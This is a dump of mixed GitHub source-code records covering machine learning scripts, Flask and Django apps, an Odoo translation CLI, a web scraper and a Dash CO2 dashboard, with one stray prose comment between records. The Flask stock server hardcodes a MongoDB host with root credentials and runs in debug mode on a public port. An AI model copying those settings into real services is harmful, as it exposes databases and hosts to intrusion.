    restore(model=\"E:/data/models/saver_save/test_model.ckpt\")\n\n\n\n","repo_name":"DaiJitao/machine_learning","sub_path":"DeepLearning/tensorflow/saver_save.py","file_name":"saver_save.py","file_ext":"py","file_size_in_byte":1970,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
{"seq_id":"34549854964","text":"import os\r\n\r\nfrom utils import *\r\nfrom defs import *\r\nfrom data_processing import process_data\r\nfrom data_processing import best_model\r\nfrom data_processing import simulations\r\nfrom analysis import get_stats\r\nfrom analysis import test_adequacy\r\n\r\nif __name__ == '__main__':\r\n    id, main_res_dir, in_model, num_of_trees, sims_per_tree, CE_path, counts_file, tree_full_path = get_arguments()\r\n    CE_res_filename, expectation_file, mlAncTree, root_freq_filename, sim_control, statistics_names = fixed_vars()\r\n    m = len(in_model)\r\n    for k in range(m):  # run over all models or a single model\r\n        model = in_model[k]\r\n        for i in range(num_of_trees):\r\n            ind = str(i + 1)\r\n            output_dir = main_res_dir + \"/adequacy_test/\"\r\n            if not os.path.exists(output_dir):\r\n                res = os.system(\r\n                    \"mkdir -p \" + output_dir)  # -p allows recursive mkdir in case one of the upper directories doesn't exist\r\n            original_counts = process_data.get_counts(counts_file)\r\n            original_counts_statistics = get_stats.calculate_statistics(original_counts, output_dir + \"orig_stats\",\r\n                                                                        main_res_dir + mlAncTree)\r\n            max_for_simulations = simulations.run_MA(main_res_dir, output_dir + sim_control, main_res_dir,\r\n                                                     output_dir, original_counts, model, sims_per_tree,\r\n                                                     tree_full_path, CE_path)\r\n            adequacy_lst = test_adequacy.model_adequacy(output_dir, original_counts_statistics, model,\r\n                                                        max_for_simulations, sims_per_tree, id, main_res_dir)\r\n\r\n    # id - job num/name\r\n    # main_res_dir - chromevol results path for a specific model BASE_NUM/\r\n    # in_model - the model the user wants to check, or the selected one\r\n    # num_of_trees - for now only 1 tree\r\n    # sims_per_tree - num of sims (1000)\r\n    # CE_path - chromevol exe path\r\n    # counts_file -\r\n    # tree_full_path -\r\n    #\r\n","repo_name":"MayroseLab/ChromevolScripts","sub_path":"Chromevol_scripts/MA_main.py","file_name":"MA_main.py","file_ext":"py","file_size_in_byte":2128,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
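The MA_main record above creates its output directory by shelling out to mkdir -p via os.system. A hedged sketch of the same step done portably with the standard library (the directory path is reused from the record; main_res_dir is assumed to come from get_arguments() as it does there):

import os

output_dir = main_res_dir + '/adequacy_test/'
# exist_ok=True reproduces mkdir -p: create intermediate directories,
# and do nothing if the path already exists
os.makedirs(output_dir, exist_ok=True)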
{"seq_id":"11104896457","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport time\nfrom os import environ as env\nimport novaclient.client\nfrom credentials import get_nova_creds\n\nnova = novaclient.client.Client(\"2\", **get_nova_creds())\n\ntry:\n\n    # select the resources for creating the instance\n    image = nova.images.find(name=\"ubuntu_cloud15\")\n    flavor = nova.flavors.find(name=\"m1.small\")\n    net = nova.networks.find(label=\"my_net2\")\n    nics = [{'net-id': net.id}]\n    \n    # create the instance\n    instance = nova.servers.create(name=\"my_inst2\", image=image,\n                                   flavor=flavor, key_name=\"my_key1\",\n                                   nics=nics)\n\n    # wait 5 seconds before printing\n    # so the commands inside nova have time to finish\n    print(\"Sleeping for 5s after create command\")\n    time.sleep(5)\n\n    # print all instances\n    print(\"List of VMs\")\n    print(nova.servers.list())\n\nfinally:\n    print(\"Execution Completed\")","repo_name":"SaltyOrange/ARIKS2016","sub_path":"Skripte/Python/Skripta5.py","file_name":"Skripta5.py","file_ext":"py","file_size_in_byte":930,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
{"seq_id":"24506944398","text":"from provworkflow.agent import Agent\nfrom rdflib.namespace import PROV, RDF\n\n\ndef test_prov_to_graph():\n    \"\"\"A basic ProvReporter should prov_to_graph an Activity with a startedAtTime & endedAtTime\n\n    :return: None\n    \"\"\"\n\n    a = Agent()\n    g = a.prov_to_graph()\n\n    # check all properties required do exist\n    assert (a.uri, RDF.type, PROV.Agent) in g, \"g must contain a prov:Agent\"\n\n    # actedOnBehalfOf test\n    a1 = Agent()\n    a2 = Agent(acted_on_behalf_of=a1)\n    g = a2.prov_to_graph()\n    assert (\n        a2.uri,\n        PROV.actedOnBehalfOf,\n        a1.uri,\n    ) in g, \"g must contain a2 prov:actedOnBehalfOf a1\"\n","repo_name":"surroundaustralia/provwf","sub_path":"tests/test_agent.py","file_name":"test_agent.py","file_ext":"py","file_size_in_byte":634,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"}
{"seq_id":"23755277698","text":"from flask import flash, url_for, redirect, request, render_template\nfrom flask_login import login_required, current_user\n\nfrom app.blueprints.main.forms import TrackerForm, CategoryForm\nfrom . import main\nfrom app.models import Tracker, TrackerCategory\nfrom app.utils import db\nfrom app.decorator import admin_required\n\n@main.route('/', methods=['GET'])\n@login_required\ndef index():\n    active_trackers = Tracker.query.filter_by(active=True).all()\n    archived_trackers = Tracker.query.filter_by(active=False).all()\n    categories = TrackerCategory.query.all()\n    categories_count = TrackerCategory.query.count()\n    return render_template('pages/home.html', active=active_trackers, archived = archived_trackers, categories=categories, categories_count=categories_count)\n\n\n@main.route('/trackers/', methods=['GET'])\n@main.route('/trackers/', defaults={'page': 1}, methods=['GET'])\n@login_required\ndef trackers(page): \n    trackers = Tracker.query.filter_by(user=current_user).order_by(Tracker.created_at.desc()).paginate(page, per_page=50)\n    categories = TrackerCategory.query.all()\n    categories_count = TrackerCategory.query.count()\n    return render_template('pages/trackers.html', archived = trackers, categories=categories, categories_count=categories_count)\n\n\n\n@main.route('/tracker///')\n@login_required\ndef view_tracker(tracker_id, tracker_title):\n    obj = Tracker.query.filter_by(user=current_user).filter_by(id=tracker_id).filter_by(title=tracker_title).first_or_404()\n    latest = Tracker.query.filter_by(user=current_user).order_by(Tracker.created_at.desc()).all()[:5]\n    categories = TrackerCategory.query.all()\n    return render_template('pages/tracker_detail.html', obj=obj, categories=categories, latest=latest) \n\n@main.route('/tracker/add', methods=['GET','POST'])\n@login_required\ndef create_tracker():\n    form = TrackerForm()\n    if form.validate_on_submit():\n        tracker_obj = Tracker(\n            title = form.title.data,\n            category = form.categories.data,\n            description = form.description.data,\n            timestamp = form.timestamp.data,\n            user = current_user\n        )\n        db.session.add(tracker_obj)\n        db.session.commit()\n        flash(f'You have 
successfully created a tracker, it will expire in {form.timestamp.data} minutes')\n return redirect(url_for('main.view_tracker', tracker_id=tracker_obj.id, tracker_title=tracker_obj.title))\n return render_template('pages/tracker-add-edit.html', form=form) \n\n@main.route('/tracker///_edit', methods=['GET', 'POST'])\n@login_required\ndef edit_tracker(tracker_id, tracker_title):\n tracker = Tracker.query.filter_by(user=current_user).first_or_404(tracker_id)\n form = TrackerForm(obj=tracker)\n if request.method == 'POST':\n if form.validate_on_submit():\n tracker.title = form.title.data\n tracker.timestamp = form.timestamp.data\n tracker.description = form.description.data\n tracker.category = form.categories.data\n db.session.add(tracker)\n db.session.commit()\n flash(f'You have successfully Edited this tracker, it will now expire in {form.timestamp.data} minutes')\n return redirect(url_for('main.view_tracker', tracker_id=tracker.id, tracker_title=tracker.title))\n return render_template('pages/tracker-add-edit.html', tracker=tracker, form=form) \n \n\n\n@main.route('/tracker///_delete')\n@login_required\ndef delete_tracker(tracker_id,tracker_title):\n obj = Tracker.query.filter_by(user=current_user).filter_by(id=tracker_id).\\\n filter_by(title=tracker_title).first_or_404()\n db.session.delete(obj)\n db.session.commit()\n flash('Tracker successfully deleted, feel free to create more', 'success')\n return redirect(url_for('main.tracker'))\n\n\n\n\n\n\n#Tracker Categories\n\n\n@main.route('/tracker/categories/add', methods=['GET', 'POST'])\n@login_required\n@admin_required\ndef tracker_category_create():\n form = CategoryForm()\n if request.method == 'POST':\n if form.validate_on_submit():\n cat = TrackerCategory(\n title=form.title.data,\n description=form.description.data,\n )\n db.session.add(cat)\n db.session.commit()\n flash('Category {} successfully created'.format(cat.title), 'success')\n return redirect(url_for('main.index'))\n return render_template('pages/category-add-edit.html', form=form)\n\n\n@main.route('/tracker/categories//edit', methods=['GET', 'POST'])\n@login_required\n@admin_required\ndef tracker_category_edit(category_id):\n category = TrackerCategory.query.get_or_404(category_id)\n form = CategoryForm(obj=category)\n if request.method == 'POST':\n if form.validate_on_submit():\n category.title = form.title.data\n category.description = form.description.data\n db.session.add(category)\n db.session.commit()\n flash('Category {} successfully Updated'.format(category.name), 'success')\n return redirect(url_for('main.index'))\n return render_template('pages/categories/add-edit.html', form=form, category=category)\n\n\n@main.route('/tracker/categories//_delete', methods=['POST'])\n@login_required\n@admin_required\ndef tracker_category_delete(category_id):\n cat = TrackerCategory.query.get_or_404(category_id)\n db.session.delete(cat)\n db.session.commit()\n flash('Successfully deleted Category.', 'success')\n return redirect(url_for('main.index'))\n\n\n\n@main.route('/category//', methods=['GET'])\n@main.route('/category/', defaults={'page': 1}, methods=['GET'])\n@login_required\ndef main_category(category_id, page):\n category = TrackerCategory.query.get(category_id)\n posts = Tracker.query.filter(Tracker.category.has(id=category.id)).order_by(Tracker.created_at.desc()).paginate(page, per_page=40)\n if category and posts:\n return render_template('pages/category-detail.html',posts=posts, category=category)\n \n\n\n@main.route('/category/', 
methods=['GET'])\n@main.route('/category/', defaults={'page': 1}, methods=['GET'])\ndef categories(page):\n category = TrackerCategory.query.paginate(page, per_page=50)\n return render_template('pages/category.html',categories=category) \n\n\"\"\"\n@main.route('/tracker//comment', methods=['POST'])\n@login_required\ndef add_comment(tracker_id):\n\n post = Tracker.query.get_or_404(tracker_id)\n\n data = request.get_json(force = True)\n text = data['text']\n\n if not text:\n\n return dict(status='fail', message='text required'), 400\n\n parent_id = data['parent_id']\n\n if parent_id and parent_id != '0' and parent_id != 0:\n\n comment = mainComment(\n\n post_id=post.id,\n\n text=text,\n\n user_id=current_user.id,\n\n parent_id=parent_id\n\n )\n\n else:\n\n comment = mainComment(\n\n post_id=post.id,\n\n text=text,\n\n user_id=current_user.id,\n\n )\n\n db.session.add(comment)\n\n db.session.commit()\n\n return dict(status='sucess', message=\"comment added successfuly\"), 201\n\"\"\"\n\n\n","repo_name":"vendari12/Quantified-self","sub_path":"src/app/blueprints/main/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7329,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"11506276708","text":"import requests\nfrom lxml import etree\n\n\n#爬取知乎网发现,今日热点的问题标题,回答者,回答。xpath的方法尝试\n# https://www.zhihu.com/explore\n\n#分析主页面\nheader = {\"User-Agent\":\"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36\"}\nreq = requests.get('https://www.zhihu.com/explore',headers=header)\nc = req.text\n\n# 初始化\nhtml = etree.HTML(c)\n# 获取热点标题\nhea = html.xpath(\"//div[@class='explore-feed feed-item']//a[@class='question_link']/text()\")\n# print(hea)\n\n# 获取回答者\naut = html.xpath(\"//div[@class='explore-feed feed-item']//div/@data-author-name\")\n# print(aut)\n\n# 获取回答内容,取到的内容太多特殊字符了,只能分页面取了\nwrite = html.xpath(\"//div[@class='explore-feed feed-item']//div/@data-entry-url\")\n# print(write)\nfor i in write:\n header = {\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36\"}\n re = requests.get('https://www.zhihu.com'+i, headers=header)\n c2 = re.text\n\n htm = etree.HTML(c2)\n write2 = htm.xpath(\"//span[@class='RichText ztext CopyrightRichText-richText']/p/text()\")\n # print(write2)\n\n# 内容组合,也是个问题,内容加不进去。。考虑下爬取豆瓣影评的方法,直接分页面找所有的,就无需组合了\ndictionary = list(zip(hea,aut))\nprint(dictionary)\n\n","repo_name":"zhouf1234/untitled8","sub_path":"xpath-demo练习5.py","file_name":"xpath-demo练习5.py","file_ext":"py","file_size_in_byte":1442,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"6082158052","text":"import numpy as np\nimport traceback\nimport sys\n\ndef runtest(test,name):\n print('Running Test: %s ... ' % (name),end='')\n try:\n if test():\n print('✔ Passed!')\n else:\n print(\"✖ Failed!\\n The output of your function does not match the expected output. Check your code and try again.\")\n except Exception as e:\n print('✖ Failed!\\n Your code raises an exception. 
The following is the traceback of the failure:')\n print(' '.join(traceback.format_tb(sys.exc_info()[2])))\n\n\ndef classify_linear_grader(xs,w,b=None):\n w = w.flatten() \n predictions=np.zeros(xs.shape[0])\n if b is None:\n b = 0\n predictions = np.sign(xs.dot(w) + b)\n return predictions\t","repo_name":"ecornelldev/CIS530","sub_path":"CIS533/perceptron/helper.py","file_name":"helper.py","file_ext":"py","file_size_in_byte":729,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"10601688802","text":"import random\nfrom transformers import DistilBertTokenizerFast\n\nfrom ml.dataloaders.mcoco import get_cococaptions_dataloader\n\n# setup random seed\nrandom.seed(17)\n\ndef test_distilbert_tokenizer(epochs, batch_size):\n tokenizer = DistilBertTokenizerFast.from_pretrained('distilbert-base-uncased')\n dataset_loader = get_cococaptions_dataloader(mode='train', batch_size=batch_size)\n\n for epoch in range(epochs): # loop over the dataset multiple times\n for i, data in enumerate(dataset_loader, 0):\n # get the inputs; data is a list of [input: image, labels: Tuple[str,...]]\n inputs, labels = data\n\n # NOTE: labels is a list of tuples, each tuple is one set of labels\n rand_idx = random.randint(0, len(labels) - 1)\n randomized_labels = list(labels[rand_idx])\n\n # inputs is a dict with input_ids and attention_mask\n inputs = tokenizer(randomized_labels, padding=\"max_length\", truncation=True)\n print(inputs)\n \n break\n break\n\n print('Finished Testing DistilBERT Tokenizer')","repo_name":"callaunchpad/phodexr","sub_path":"ml/testing/distilbert_tokenizer.py","file_name":"distilbert_tokenizer.py","file_ext":"py","file_size_in_byte":1101,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"35"} +{"seq_id":"15040006000","text":"from flask import Flask, jsonify, request\nfrom pymongo import MongoClient, errors\nfrom flask_cors import CORS\napp = Flask(__name__)\nCORS(app)\n# global variables for MongoDB host (default port is 27017)\nDOMAIN = '15.236.141.54'\nPORT = 27017\n \nclient = MongoClient(\n host = [ str(DOMAIN) + \":\" + str(PORT) ],\n serverSelectionTimeoutMS = 3000, # 3 second timeout\n username = \"root\",\n password = \"1234\",\n)\n # print the version of MongoDB server if connection successful\nmydb = client.stocks\nmydb = client['stocktsla']\nmycol = mydb[\"TSLA\"]\ncol = mydb[\"TSLA30\"]\n \n@app.route('/stock/TSLA', methods=['GET'])\ndef get_all_frameworks():\n output = []\n for x in mycol.find():\n output.append({'day':x['day'],'hour':x['hour']+1,'minute':x['minute'],'second' : x['second'], 'data' : x['data']})\n return jsonify({'result' : output})\n \n@app.route('/stock/TSLA/30', methods=['GET'])\ndef get_all_framew():\n output = []\n for x in col.find():\n output.append({'Datetime':x['Datetime'],'Open' : x['Open'], 'High' : x['High'], 'Low' : x['Low'], 'Close' : x['Close']})\n return jsonify(output)\n \n@app.route('/stock/TSLA////', methods=['GET'])\ndef get_all_framework(day,hour,minute,second):\n output = []\n q = mycol.find_one({'day':int(day),'hour':int(hour),'minute':int(minute),'second':int(second)})\n \n if q:\n output = {'day':q['day'],'hour':q['hour'],'minute':q['minute'],'second' : q['second'], 'data' : q['data']}\n else:\n output = 'No results found'\n \n return jsonify({'result' : output})\n \n \nif __name__ == '__main__':\n app.run(host='0.0.0.0',port=80,debug=True)\n \n \n","repo_name":"abdrrahimelh/middlwares","sub_path":"Rest 
Server/Rest.py","file_name":"Rest.py","file_ext":"py","file_size_in_byte":1667,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"26138181920","text":"import matplotlib.pyplot as plt\r\nfrom numpy import *\r\n\r\n\"\"\"\r\nLoad simple dataset for linear regression.\r\nRow in file: [feature1, feature2, ..., featureN, label]\r\nAnd then, we can get matrix of dataset and labels conveniently.\r\n\"\"\"\r\nclass Simple_dataset(object):\r\n\r\n def __init__(self, file_name):\r\n fr = open(file_name)\r\n dataset = []; labels = [];\r\n for line in fr.readlines():\r\n splits = line.split()\r\n num_features = len(splits)\r\n # The column in the end is the label of this line.\r\n data = [float(splits[i]) for i in range(num_features - 1)]\r\n label = float(splits[-1])\r\n\r\n dataset.append(data)\r\n labels.append(label)\r\n self.dataset = dataset\r\n self.labels = labels\r\n\r\n def normalize(self):\r\n dataset = mat(self.dataset)\r\n means = mean(dataset, 0)\r\n vars = var(dataset, 0)\r\n # operations between matrix and vector:\r\n self.dataset = (dataset - means) / vars\r\n\r\n\r\n # Plot all the data in a figure\r\n def draw_scatter(self):\r\n fig = plt.figure()\r\n ax = fig.add_subplot(111)\r\n plt.xlabel('X1'); plt.ylabel('Label')\r\n # Note: in order to support 'dataset[:, 1]', we must change dataset from list to array.\r\n dataset = array(self.dataset)\r\n ax.scatter(dataset[:, 1], self.labels, s=8)\r\n plt.show()\r\n\r\n\r\nif __name__ == '__main__':\r\n my_dataset = Simple_dataset('data/training_set.txt')\r\n my_dataset.normalize()\r\n my_dataset.draw_scatter()\r\n\r\n","repo_name":"Kobeyond/Codes-for-Machine-Learning","sub_path":"Linear Regression/simple_dataset.py","file_name":"simple_dataset.py","file_ext":"py","file_size_in_byte":1555,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"35"} +{"seq_id":"31292932081","text":"from django.urls import path\nfrom .views import StaffDashboard,SatffStudentList,SatffCandidateList,StaffStudentProfile,SatffCandidateProfile,StaffProfileDisplay\nfrom .views import StaffStudentAddForm,SatffCandidateAddForm,SatffCandidateProfileBack,StaffStudentProfileback\nfrom .views import Stafflogout\nfrom .views2 import StaffCandCampaign,StaffCandidatePostView\nimport random\ndef dynamic_url():\n Large=['A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z']\n small=['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z']\n sign=['1','2','3','4','5','6','7','9','0','+0','_']\n p=(''.join([''.join( random.sample(Large, 5)),''.join(random.sample(small, 5)),''.join(random.sample(sign, 5))]))\n return (''.join( random.sample(p, 10)))\nurlpatterns = [\n path('',StaffDashboard,name='StaffDashboard'),\n path('StaffProfileDisplay%s/'%dynamic_url(),StaffProfileDisplay,name='StaffProfileDisplay'),\n #StaffProfileDisplay\n\n path('Stulist/',SatffStudentList,name='StaffStudentList'),\n path('Stuprofile/',StaffStudentProfile,name='StaffStudentProfile'),\n path('Stuprofileback/',StaffStudentProfileback,name='StaffStudentProfileback'),\n path('%s/'%dynamic_url(),StaffStudentAddForm,name='StaffStudentAddForm'),\n\n path('CandidList/',SatffCandidateList,name='SatffCandidateList'),\n path('CandidProfile%s/'%dynamic_url(),SatffCandidateProfile,name='SatffCandidateProfile'),\n path('CandidProfileback/',SatffCandidateProfileBack,name='SatffCandidateProfileBack'),\n 
path('candidateAddForm',SatffCandidateAddForm,name='SatffCandidateAddForm'),\n\n path('Stafflogout/',Stafflogout,name='Stafflogout'),\n\n path('StaffCandCampaign/',StaffCandCampaign,name='StaffCandCampaign'),\n path('StaffCandidatePostView/',StaffCandidatePostView,name='StaffCandidatePostView'),\n]\n\n\n","repo_name":"rp2691981/VotingApp","sub_path":"Voting1/Staff/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1900,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"23446368945","text":"import sys\nimport os\nimport tempfile\nimport click\n\nfrom odooku.cli.resolve import resolve_db_name, resolve_db_name_multiple\n\n\n__all__ = [\n 'trans'\n]\n\n\nCHUNK_SIZE = 16 * 1024\n\n\n@click.command()\n@click.argument('language', nargs=1)\n@click.option(\n '--db-name',\n callback=resolve_db_name\n)\n@click.option(\n '--module',\n multiple=True\n)\n@click.option(\n '--fix',\n is_flag=True\n)\n@click.pass_context\ndef export(ctx, language, db_name, module, fix):\n modules = module or ['all']\n\n from odoo.modules.registry import Registry\n from odooku.api import environment\n from odoo.tools import trans_export\n\n with tempfile.TemporaryFile() as t:\n\n # Perform checks (and possible fixes)\n registry = Registry(db_name)\n with registry.cursor() as cr:\n with environment(cr) as env:\n lang = env['res.lang'].with_context(dict(active_test=False)).search([('code', '=', language)])\n if not lang:\n raise ValueError(\"Language %s does not exist\" % language)\n if not lang[0].active:\n if not fix:\n raise ValueError(\"Language %s is not activated\" % language)\n else:\n installed = env['ir.module.module'].search([('state', '=', 'installed')])\n installed._update_translations(language)\n\n if module:\n installed = env['ir.module.module'].search([('name', 'in', module), ('state', '=', 'installed')])\n missing = set(module) - set([mod.name for mod in installed])\n if missing:\n if not fix:\n raise ValueError(\"Modules '%s' are not installed\" % \", \".join(missing))\n else:\n ctx.obj['config']['init'] = {\n module_name: 1\n for module_name in module\n }\n \n # Export\n registry = Registry.new(db_name, update_module=fix)\n with registry.cursor() as cr:\n with environment(cr) as env:\n trans_export(language, modules, t, 'po', cr)\n \n t.seek(0)\n # Pipe to stdout\n while True:\n chunk = t.read(CHUNK_SIZE)\n if not chunk:\n break\n sys.stdout.buffer.write(chunk)\n\n\n@click.command('import')\n@click.argument('language', nargs=1)\n@click.option(\n '--db-name',\n callback=resolve_db_name\n)\n@click.option(\n '--overwrite',\n is_flag=True\n)\n@click.pass_context\ndef import_(ctx, language, db_name, overwrite):\n context = {\n 'overwrite': overwrite\n }\n\n from odoo.modules.registry import Registry\n from odooku.api import environment\n from odoo.tools import trans_load\n\n with tempfile.NamedTemporaryFile(suffix='.po', delete=False) as t:\n registry = Registry(db_name)\n\n # Read from stdin\n while True:\n chunk = sys.stdin.buffer.read(CHUNK_SIZE)\n if not chunk:\n break\n t.write(chunk)\n t.close()\n\n with registry.cursor() as cr:\n with environment(cr) as env:\n trans_load(cr, t.name, language, context=context)\n\n os.unlink(t.name)\n\n\n@click.command('update')\n@click.option(\n '--db-name',\n multiple=True,\n callback=resolve_db_name_multiple\n)\n@click.option(\n '--module',\n multiple=True\n)\n@click.option(\n '--language',\n multiple=True\n)\n@click.option(\n '--overwrite',\n is_flag=True\n)\n@click.pass_context\ndef update(ctx, 
db_name, module, language, overwrite):\n context = {\n 'overwrite': overwrite\n }\n\n from odoo.modules.registry import Registry\n from odooku.api import environment\n\n domain = [('state', '=', 'installed')]\n if module:\n domain = [('name', 'in', module)]\n\n\n for db in db_name:\n registry = Registry(db)\n with registry.cursor() as cr:\n with environment(cr) as env:\n mods = env['ir.module.module'].search(domain)\n mods.with_context(overwrite=overwrite)._update_translations(language)\n\n\n@click.group()\n@click.pass_context\ndef trans(ctx):\n pass\n\n\ntrans.add_command(export)\ntrans.add_command(import_)\ntrans.add_command(update)\n","repo_name":"odooku/odooku","sub_path":"odooku_commands/trans.py","file_name":"trans.py","file_ext":"py","file_size_in_byte":4378,"program_lang":"python","lang":"en","doc_type":"code","stars":53,"dataset":"github-code","pt":"35"} +{"seq_id":"26885057731","text":"\"\"\"\n dashCO2.dashapp\n ~~~~~~~~~~~~~~~\n\n Applicación en dash\n\"\"\"\n\nimport arrow\nimport dash\nimport dash_core_components as dcc\nimport dash_daq as daq\nimport dash_html_components as html\nimport plotly.graph_objs as go\nfrom dash.dependencies import Input, Output\n\nfrom . import config, models\nfrom .shared import COLORS, color_from_value\n\nSPARKLINE_LAYOUT = {\n \"uirevision\": True,\n \"margin\": dict(l=0, r=0, t=4, b=4, pad=0),\n \"xaxis\": dict(\n showline=False,\n showgrid=False,\n zeroline=False,\n showticklabels=False,\n ),\n \"yaxis\": dict(\n showline=False,\n showgrid=False,\n zeroline=False,\n showticklabels=False,\n ),\n \"paper_bgcolor\": \"rgba(0,0,0,0)\",\n \"plot_bgcolor\": \"rgba(0,0,0,0)\",\n}\n\n\ndef build_banner(dash_app):\n return html.Div(\n id=\"banner\",\n className=\"banner\",\n children=[\n html.Div(\n id=\"banner-logo\",\n children=[\n html.Img(\n id=\"logo\",\n src=dash_app.get_asset_url(\"logo-exactas.png\"),\n ),\n ],\n ),\n html.Div(\n id=\"banner-text\",\n className=\"row metric-row metric-row-up\",\n children=[html.H5(\"Monitoreo de CO2\")],\n ),\n html.Div(\n id=\"banner-summary\",\n className=\"row metric-row\",\n children=[\n \"DIA y HORA\",\n daq.Indicator(\n id=\"summary-ok\",\n value=True,\n color=COLORS.OK,\n size=12,\n className=\"indicator\",\n ),\n \" N\",\n daq.Indicator(\n id=\"summary-warning\",\n value=True,\n color=COLORS.WARNING,\n size=12,\n className=\"indicator\",\n ),\n \" N\",\n daq.Indicator(\n id=\"summary-danger\",\n value=True,\n color=COLORS.DANGER,\n size=12,\n className=\"indicator\",\n ),\n \" N\",\n daq.Indicator(\n id=\"summary-offline\",\n value=True,\n color=COLORS.OFFLINE,\n size=12,\n className=\"indicator\",\n ),\n \" N\",\n ],\n ),\n ],\n )\n\n\ndef build_header():\n return html.Div(\n className=\"section-banner\",\n style={\"width\": \"100%\", \"display\": \"inline-block\"},\n children=[\n \"Sensores\",\n html.Div(\n id=\"subsection-banner\",\n children=[\n dcc.Checklist(\n options=[\n dict(\n label=\"Ver valores\", value=\"view-values\"\n ),\n ],\n value=[\"view-values\"],\n id=\"view-options\",\n className=\"checklist-smoothing\",\n labelStyle={\"display\": \"inline-block\"},\n labelClassName=\"mleft\",\n ),\n html.Div(style=dict(width=\"35px\")),\n dcc.Checklist(\n options=[],\n value=[],\n id=\"filter-buildings\",\n className=\"checklist-smoothing\",\n labelStyle={\"display\": \"inline-block\"},\n labelClassName=\"mleft\",\n ),\n ],\n style={\"float\": \"right\", \"display\": \"flex\"},\n ),\n ],\n )\n\n\ndef build_box(\n device: dict,\n dev_recent_measurements: (list, list),\n buildings,\n 
view_options=(),\n):\n\n devid = device[\"id\"]\n serial_number = device[\"serial_number\"]\n floor = device[\"floor\"]\n box_title = device[\"room\"]\n building = device[\"building\"]\n\n if box_title == \"s/d\":\n box_title = f\"s/n {serial_number}\"\n\n ref_serial_no = reference_value = None\n # if 'view-reference' in view_options:\n # ref_serial_no, reference_value = get_reference_value(serialno)\n\n x, y = dev_recent_measurements\n if x:\n current_value = y[-1]\n color = color_from_value(current_value, x[-1])\n\n # if reference_value is None:\n # current_value_str = f\"{current_value}\"\n # else:\n # current_value_str = f\"{current_value - reference_value:+}\"\n\n fig = go.Figure(\n {\n \"data\": [\n {\n \"x\": list(x),\n \"y\": list(y),\n \"mode\": \"lines\",\n \"name\": f\"sparkline-line-{serial_number}-id\",\n \"line\": {\"color\": \"#888\", \"width\": 3},\n }\n ],\n \"layout\": SPARKLINE_LAYOUT,\n }\n )\n else:\n current_value = \"s/d\"\n color = COLORS.OFFLINE\n fig = go.Figure(\n {\n \"layout\": SPARKLINE_LAYOUT,\n }\n )\n\n xmax = arrow.utcnow().float_timestamp\n xmin = xmax - config.DISPLAY_LEN_SEC\n fig.update_layout(xaxis_range=[xmin, xmax], yaxis_range=[0, 1200])\n\n fig.add_hline(\n config.RANGES.OK,\n line_dash=\"dot\",\n line_width=1,\n line_color=COLORS.OK,\n )\n fig.add_hline(\n config.RANGES.WARNING,\n line_dash=\"dot\",\n line_width=1,\n line_color=COLORS.WARNING,\n )\n fig.add_hline(\n config.RANGES.DANGER,\n line_dash=\"dot\",\n line_width=1,\n line_color=COLORS.DANGER,\n )\n\n return html.Div(\n className=\"grid-item \" + buildings[building],\n children=[\n html.Div(\n id=f\"header-{serial_number}-id\",\n className=\"header\",\n children=[\n daq.Indicator(\n id=f\"indicator-{serial_number}-id\",\n value=True,\n color=color,\n size=12,\n style={\"margin\": \"5px\", \"float\": \"right\"},\n ),\n box_title,\n ],\n ),\n html.Div(\n id=f\"mainbody-{serial_number}-id\",\n className=\"mainbody\",\n children=[\n dcc.Graph(\n id=f\"sparkline-{serial_number}-id\",\n className=\"sparkline-graph\",\n config={\n \"staticPlot\": False,\n \"editable\": False,\n \"displayModeBar\": False,\n },\n figure=fig,\n ),\n html.Div(\n id=f\"bigvalue-{serial_number}-id\",\n className=\"bigvalue\",\n children=f\"{current_value}\",\n style={\"color\": color},\n ),\n html.Div(\n id=f\"bigvalue-delta-{serial_number}-id\",\n className=\"bigvalue-delta\",\n children=f\"Δ {current_value - reference_value} \"\n f\"({ref_serial_no})\",\n style={\"color\": color},\n )\n if ref_serial_no is not None\n else None,\n ],\n ),\n html.Div(\n id=f\"footer-{serial_number}-id\",\n className=\"footer\",\n children=dcc.Link(\n href=f\"/admin/device/details/?id={devid}\",\n children=f\"Nivel {floor} - {building} \"\n f\"(s/n {serial_number})\",\n target=\"_blank\",\n className=\"footer\",\n ),\n ),\n ],\n )\n\n\ndef build_app(**kwargs):\n\n dash_app = dash.Dash(\n __name__,\n meta_tags=[\n {\n \"name\": \"viewport\",\n \"content\": \"width=device-width, initial-scale=1\",\n }\n ],\n **kwargs,\n )\n\n @dash_app.callback(\n [\n Output(\"devices\", \"data\"),\n Output(\"buildings\", \"data\"),\n Output(\"filter-buildings\", \"options\"),\n ],\n [Input(\"interval-component-devices\", \"n_intervals\")],\n )\n def update_dbb(interval_value):\n return models.load_devices()\n\n @dash_app.callback(\n [\n Output(\"recent-measurements\", \"data\"),\n Output(\"last-update\", \"data\"),\n ],\n [\n Input(\"devices\", \"data\"),\n Input(\"interval-component-records\", \"n_intervals\"),\n ],\n )\n def 
